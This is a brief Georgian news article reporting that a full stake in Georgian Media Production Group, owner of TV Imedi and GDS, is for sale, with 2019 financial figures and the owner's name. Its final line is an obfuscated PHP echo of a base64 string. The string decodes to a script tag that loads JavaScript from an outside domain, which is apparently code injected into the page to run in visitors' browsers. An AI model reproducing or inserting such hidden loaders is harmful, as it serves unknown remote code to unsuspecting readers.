celsiusi
ავერსი საქკაბელი
ტელეკომპანია იმედის მფლობელი კომპანიის, ჯორჯიან მედია პროდაქშენ გრუპის 100%-იანი წილი იყიდება - ამის შესახებ კომუნიკაციების კომისიის სხდომის დღის წესრიგიდან გახდა ცნობილი. დღის წესრიგში არაა მითითებული თუ ვინ გეგმავს ამ კომპანიის შეძენას. "ტელეიმედთან" ერთად ჯორჯიან მედია პროდაქშენ გრუპს ტელეკომპანია GDS-იც ეკუთვნის. 
 
"შპს „ჯორჯიან მედია პროდაქშენ გრუპის“ (ს/კ 204563123) წილის 100%-ის შეძენაზე თანხმობის მიცემის საკითხის განხილვის შესახებ (მომხს. მერაბ კანკავა - სატელეკომუნიკაციო ბაზრის რეგულირების დეპარტამენტი),"- ნათქვამია კომუნიკაციების კომისიის დღის წესრიგში, რომელიც ახლა მიმდინარეობს.
 
2019 წლის მდგომარეობით, კომპანიის აქტივები 24.6 მილიონი ლარი იყო. ფინანსური ანგარიშის თანახმად, 2019-ში კომპანიის შემოსავალი (არ შედის შვილობილი კომპანიების შემოსავლები) 1.8 მილიონი ლარი, წმინდა მოგება კი 1.4 მილიონი ლარი იყო.
 
ჯგუფის 100%-იანი წილის მფლობელი ბიზნესმენ ბადრი პატარკაციშვილის ქვრივი ინა გუდავაძეა.
1408
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");